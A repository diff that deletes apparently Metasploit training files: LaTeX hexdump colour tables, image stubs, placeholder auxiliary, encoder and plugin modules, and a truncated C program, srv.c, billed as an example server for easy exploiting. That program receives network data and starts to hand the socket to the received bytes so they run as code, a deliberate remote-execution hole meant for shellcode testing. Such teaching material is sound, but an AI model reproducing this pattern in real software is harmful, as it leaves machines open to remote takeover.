\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy0}{rgb}{0,0,0}
|
||||
\definecolor{HexyGreen}{rgb}{0,.7,0}
|
||||
{\footnotesize
|
||||
\begin{semiverbatim}
|
||||
total: 6000
|
||||
uniq: 141
|
||||
\color{HexyGreen}\color{HexyGreen} 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
|
||||
\color{HexyGreen}00 \color{Hexy0}00 \color{Hexy18}12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy18}12 \color{Hexy17}11 11 11 \color{Hexy57}39 39 \color{Hexy0}00 00
|
||||
\color{HexyGreen}10 \color{Hexy18}12 12 12 \color{Hexy17}11 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy18}12 12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 00
|
||||
\color{HexyGreen}20 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39 \color{Hexy18}12 12 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
|
||||
\color{HexyGreen}30 \color{Hexy17}11 11 \color{Hexy18}12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39 \color{Hexy17}11 11 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
|
||||
\color{HexyGreen}40 \color{Hexy57}39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 39 39 39 39 39 \color{Hexy0}00 00 \color{Hexy57}39 \color{Hexy58}3a
|
||||
\color{HexyGreen}50 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}60 \color{Hexy0}00 00 00 00 00 00 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy0}00 \color{Hexy17}11 \color{Hexy0}00 00 00 00
|
||||
\color{HexyGreen}70 \color{Hexy58}3a \color{Hexy57}39 39 39 39 39 39 39 39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 39
|
||||
\color{HexyGreen}80 \color{Hexy18}12 12 \color{Hexy0}00 \color{Hexy18}12 12 \color{Hexy17}11 11 \color{Hexy18}12 12 12 \color{Hexy0}00 00 00 00 00 00
|
||||
\color{HexyGreen}90 \color{Hexy57}39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 39 39 39 \color{Hexy0}00 \color{Hexy57}39 \color{Hexy0}00 00 00 \color{Hexy57}39
|
||||
\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 \color{Hexy58}3a \color{Hexy57}39 \color{Hexy0}00 00 00 00 00 00
|
||||
\color{HexyGreen}b0 \color{Hexy58}3a \color{Hexy57}39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 39 39 39 39 \color{Hexy0}00 00 \color{Hexy58}3a \color{Hexy57}39
|
||||
\color{HexyGreen}c0 \color{Hexy18}12 12 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}d0 \color{Hexy18}12 12 12 \color{Hexy17}11 \color{Hexy57}39 39 39 \color{Hexy0}00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}e0 \color{Hexy57}39 39 39 39 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy57}39 \color{Hexy0}00 00 00 00
|
||||
\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy57}39 \color{Hexy17}11 11 \color{Hexy58}3a \color{Hexy57}39 \color{Hexy0}00 00 \color{Hexy57}39 39 \color{Hexy17}11 11
|
||||
\end{semiverbatim}
|
||||
}
|
|
@ -1,166 +0,0 @@
|
|||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy16}{rgb}{0.062,0,0.937}
|
||||
\definecolor{Hexy16}{rgb}{0.062,0,0.937}
|
||||
\definecolor{Hexy0}{rgb}{0,0,0}
|
||||
\definecolor{HexyGreen}{rgb}{0,.7,0}
|
||||
{\footnotesize
|
||||
\begin{semiverbatim}
|
||||
total: 6000
|
||||
uniq: 141
|
||||
\color{HexyGreen}\color{HexyGreen} 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
|
||||
\color{HexyGreen}00 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy17}11 11 \color{Hexy57}39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy17}11 \color{Hexy18}12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 00
|
||||
\color{HexyGreen}10 \color{Hexy17}11 11 11 11 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy17}11 11 \color{Hexy57}39 39 \color{Hexy0}00 00
|
||||
\color{HexyGreen}20 \color{Hexy18}12 12 12 12 \color{Hexy57}39 \color{Hexy58}3a \color{Hexy0}00 \color{Hexy58}3a \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
|
||||
\color{HexyGreen}30 \color{Hexy17}11 \color{Hexy18}12 12 \color{Hexy17}11 \color{Hexy57}39 \color{Hexy58}3a \color{Hexy0}00 \color{Hexy58}3a \color{Hexy18}12 12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
|
||||
\color{HexyGreen}40 \color{Hexy57}39 \color{Hexy58}3a 3a \color{Hexy57}39 \color{Hexy0}00 00 \color{Hexy57}39 39 39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 39
|
||||
\color{HexyGreen}50 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}60 \color{Hexy0}00 00 00 00 00 00 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy0}00 \color{Hexy17}11 \color{Hexy0}00 00 00 00
|
||||
\color{HexyGreen}70 \color{Hexy57}39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 39 39 39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39
|
||||
\color{HexyGreen}80 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 12 12 \color{Hexy0}00 00 00 00 00 00
|
||||
\color{HexyGreen}90 \color{Hexy57}39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 \color{Hexy58}3a 3a 3a \color{Hexy0}00 \color{Hexy57}39 \color{Hexy0}00 00 00 \color{Hexy57}39
|
||||
\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 \color{Hexy57}39 39 \color{Hexy0}00 00 00 00 00 00
|
||||
\color{HexyGreen}b0 \color{Hexy57}39 39 39 39 39 39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy57}39 39
|
||||
\color{HexyGreen}c0 \color{Hexy17}11 11 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}d0 \color{Hexy18}12 12 \color{Hexy17}11 11 \color{Hexy57}39 39 \color{Hexy58}3a \color{Hexy0}00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}e0 \color{Hexy58}3a \color{Hexy57}39 39 39 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy57}39 \color{Hexy0}00 00 00 00
|
||||
\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy57}39 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy57}39 39 \color{Hexy16}10 10
|
||||
\end{semiverbatim}
|
||||
}
|
Before Width: | Height: | Size: 3.7 KiB |
Before Width: | Height: | Size: 4.7 KiB |
Before Width: | Height: | Size: 4.7 KiB |
Before Width: | Height: | Size: 4.9 KiB |
Before Width: | Height: | Size: 4.9 KiB |
Before Width: | Height: | Size: 5.0 KiB |
Before Width: | Height: | Size: 4.7 KiB |
Before Width: | Height: | Size: 4.6 KiB |
Before Width: | Height: | Size: 3.5 KiB |
Before Width: | Height: | Size: 37 KiB |
Before Width: | Height: | Size: 42 KiB |
|
@ -1,19 +0,0 @@
|
|||
module Msf
|
||||
|
||||
class Auxiliary::BhAux < Msf::Auxiliary
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => "BlackHat Training Auxiliary Module",
|
||||
'Description' => "Example Auxiliary Module",
|
||||
'Author' => "skape",
|
||||
'License' => MSF_LICENSE)
|
||||
end
|
||||
|
||||
def run
|
||||
print_status("Inside run...")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
|
@ -1,22 +0,0 @@
|
|||
module Msf
|
||||
module Encoders
|
||||
|
||||
class BlackHatEncoder < Msf::Encoder
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'BlackHat Example Encoder',
|
||||
'Version' => '$Revision: 3154 $',
|
||||
'Description' => %q{
|
||||
Sample encoder that just returns the block it's passed
|
||||
when encoding occurs.
|
||||
},
|
||||
'Author' => 'skape',
|
||||
'Arch' => ARCH_ALL)
|
||||
end
|
||||
|
||||
def encode_block(state, buf)
|
||||
buf
|
||||
end
|
||||
|
||||
end ;end ;end
|
|
@ -1,12 +0,0 @@
|
|||
module Msf
|
||||
class Plugin::Bob < Msf::Plugin
|
||||
module BobExtension
|
||||
def bob
|
||||
"bob"
|
||||
end
|
||||
end
|
||||
def initialize(framework, options)
|
||||
framework.extend(BobExtension)
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,116 +0,0 @@
|
|||
|
||||
/*
|
||||
* srv.c -- Example server for easy exploiting
|
||||
*
|
||||
* Usage: srv <port>
|
||||
*
|
||||
* Example:
|
||||
*
|
||||
* C:\> srv 1234
|
||||
* C:\> nload localhost 1234 -s code.s
|
||||
*
|
||||
*/
|
||||
|
||||
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <errno.h>
|
||||
|
||||
#if defined _WIN32
|
||||
#include <winsock2.h>
|
||||
#pragma comment(lib, "ws2_32.lib")
|
||||
#else
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <netdb.h>
|
||||
#include <unistd.h>
|
||||
#endif
|
||||
|
||||
#define SERVER_PORT 5433
|
||||
#define MAX_PENDING 1
|
||||
|
||||
|
||||
int ehlo, from;
|
||||
|
||||
/* Main function */
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
struct sockaddr_in sin;
|
||||
char buf[8092], *ptr;
|
||||
int c, i, len, port;
|
||||
int s, new_s, bytes;
|
||||
#if defined _WIN32
|
||||
int wsaret;
|
||||
WSADATA wsaData;
|
||||
#endif
|
||||
int (*funct)();
|
||||
|
||||
|
||||
/* Command line parameters */
|
||||
if (argv[1])
|
||||
port = atoi(argv[1]);
|
||||
else
|
||||
port = SERVER_PORT;
|
||||
|
||||
#if defined _WIN32
|
||||
/* Initialize winsock */
|
||||
wsaret = WSAStartup(0x101, &wsaData);
|
||||
if(wsaret != 0)
|
||||
return (0);
|
||||
|
||||
/* Create a socket */
|
||||
if ((s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0) {
|
||||
fprintf(stderr, "%s: WSASocket - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
#else
|
||||
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
|
||||
fprintf(stderr, "%s: socket - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
#endif
|
||||
|
||||
/* Initialize the addres data structure */
|
||||
memset((void *)&sin, 0, sizeof(sin));
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = INADDR_ANY;
|
||||
sin.sin_port = htons(port);
|
||||
|
||||
/* Bind an address to the socket */
|
||||
if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
|
||||
fprintf(stderr, "%s: bind - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
/* Set the length of the listen queue */
|
||||
if (listen(s, MAX_PENDING) < 0) {
|
||||
fprintf(stderr, "%s: listen - %s\n", argv[0], strerror(errno));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
|
||||
len = sizeof(sin);
|
||||
new_s = accept(s, (struct sockaddr *)&sin, &len);
|
||||
|
||||
memset(buf, 0, sizeof(buf));
|
||||
bytes = recv(new_s, buf, sizeof(buf), 0);
|
||||
|
||||
printf("recv'd %d\n", bytes);
|
||||
|
||||
|
||||
/* Run the code */
|
||||
fprintf(stderr,"Oops.. I'm 0wned.\n");
|
||||
|
||||
__asm mov edi, new_s
|
||||
|
||||
